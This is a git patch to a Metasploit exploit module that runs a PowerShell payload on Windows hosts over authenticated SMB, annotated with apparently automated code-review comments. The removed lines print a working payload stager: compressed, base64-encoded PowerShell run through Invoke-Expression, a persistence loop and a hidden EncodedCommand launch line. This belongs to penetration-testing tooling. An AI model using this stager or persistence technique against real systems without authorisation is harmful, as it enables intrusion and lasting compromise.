From 6ba85d4c06613e182707fa3a5e42e8bcad9baac3 Mon Sep 17 00:00:00 2001
From: RageLtMan
Date: Wed, 30 Jan 2013 12:38:53 -0500
Subject: [PATCH] add libs from #1379 and allow psh 1.0 exec against older hosts
---
 modules/exploits/windows/smb/psexec_psh.rb | 84 ++++++----------------
 1 file changed, 20 insertions(+), 64 deletions(-)
diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb
index a1dc9261d1..61da9c8599 100644
--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -1,16 +1,19 @@
 # -*- coding: binary -*-
+#!/usr/bin/env ruby
+
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ManualRanking
+  # Exploit mixins should be called first
   include Msf::Exploit::Remote::DCERPC
   include Msf::Exploit::Remote::SMB
   include Msf::Exploit::Remote::SMB::Authenticated
+  include Msf::Exploit::Powershell
   include Msf::Auxiliary::Report
   include Msf::Exploit::EXE
-  # Aliases for common classes
   SIMPLE = Rex::Proto::SMB::SimpleClient
   XCEPT = Rex::Proto::SMB::Exceptions
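Review bot: The `#!/usr/bin/env ruby` added as line 2 is not a shebang — an interpreter line is only honoured on the first line of a file, and here `# -*- coding: binary -*-` already holds that position, so the new line is a dead comment. Framework modules are loaded by the module loader rather than executed directly, so the line and the blank `+` after it can simply be dropped rather than swapped above the coding comment. The rest of the hunk (the new `include Msf::Exploit::Powershell` and the removed `# Aliases for common classes` comment) raises nothing.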
@@ -71,31 +74,32 @@ class Metasploit3 < Msf::Exploit::Remote
           'Execute powershell in 32bit compatibility mode, payloads need native arch', false ]),
+        OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
       ], self.class)
   end
-  def exploit
-    # Build the script
-    command = prep_psh_payload
+  def exploit
+    command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
-    # Try and authenticate with given credentials
+    #Try and authenticate with given credentials
     if connect
-      begin
+      begin
         smb_login
       rescue StandardError => autherror
         print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
         return
-      end
-      # Execute the powershell command
-      begin
-        print_status("#{peer} - Executing the payload...")
-        return psexec(command)
-      rescue StandardError => exec_command_error
-        print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
-        return false
-      end
-      disconnect
+      end
+      # Execute the powershell command
+      begin
+        print_status("#{peer} - Executing the payload...")
+        #vprint_good(command)
+        return psexec(command)
+      rescue StandardError => exec_command_error
+        print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
+        return false
+      end
+      disconnect
     end
   end
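Review bot: The `disconnect` at the end of the new `exploit` body is unreachable — the `begin` block above it returns on the `psexec(command)` path and returns `false` from its `rescue`, so the SMB session is never torn down explicitly (the pre-change code had the same gap, and the auth-failure `return` after `smb_login` leaks the connection too). Moving the call into an `ensure` keeps both return values and makes cleanup unconditional: replace the trailing `end` / `disconnect` pair with `ensure`, `disconnect`, `end`, and consider wrapping the `smb_login` block the same way. Two smaller points on the same lines: `cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])` wants a space after the comma, and the commented-out `#vprint_good(command)` should either become a real `vprint_good` call or be removed. Finally, `RUN_WOW64` remains registered in this hunk's context and `PERSIST` was previously read only by the `prep_psh_payload` this commit deletes, yet neither is passed to `cmd_psh_payload`; unless the Powershell mixin reads them from the datastore itself, both options are now silently ignored and should be dropped or forwarded.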
@@ -220,56 +224,8 @@ class Metasploit3 < Msf::Exploit::Remote
     return true
   end
-  # Return a zlib compressed powershell script
-  def compress_script(script_in)
-
-    # Compress using the Deflate algorithm
-    compressed_stream = ::Zlib::Deflate.deflate(script_in,
-      ::Zlib::BEST_COMPRESSION)
-
-    # Base64 encode the compressed file contents
-    encoded_stream = Rex::Text.encode_base64(compressed_stream)
-
-    # Build the powershell expression
-    # Decode base64 encoded command and create a stream object
-    psh_expression = "$stream = New-Object IO.MemoryStream(,"
-    psh_expression += "$([Convert]::FromBase64String('#{encoded_stream}')));"
-    # Read & delete the first two bytes due to incompatibility with MS
-    psh_expression += "$stream.ReadByte()|Out-Null;"
-    psh_expression += "$stream.ReadByte()|Out-Null;"
-    # Uncompress and invoke the expression (execute)
-    psh_expression += "$(Invoke-Expression $(New-Object IO.StreamReader("
-    psh_expression += "$(New-Object IO.Compression.DeflateStream("
-    psh_expression += "$stream,"
-    psh_expression += "[IO.Compression.CompressionMode]::Decompress)),"
-    psh_expression += "[Text.Encoding]::ASCII)).ReadToEnd());"
-
-    # Convert expression to unicode
-    unicode_expression = Rex::Text.to_unicode(psh_expression)
-
-    # Base64 encode the unicode expression
-    encoded_expression = Rex::Text.encode_base64(unicode_expression)
-
-    return encoded_expression
-  end
-
   def peer
     return "#{rhost}:#{rport}"
   end
-  # Return a command-line payload configured per datastore
-  def prep_psh_payload
-    psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.raw)
-    # Run our payload in a while loop
-    if datastore['PERSIST']
-      fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
-      sleep_time = rand(5)+5
-      psh_payload = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
-    end
-    # Convert to base64 for -encodedcommand execution
-    psh_payload = compress_script(psh_payload)
-    # Determine appropriate architecture
-    ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
-    command = "%COMSPEC% /B /C start #{ps_bin} -EncodedCommand #{psh_payload}"
-  end
 end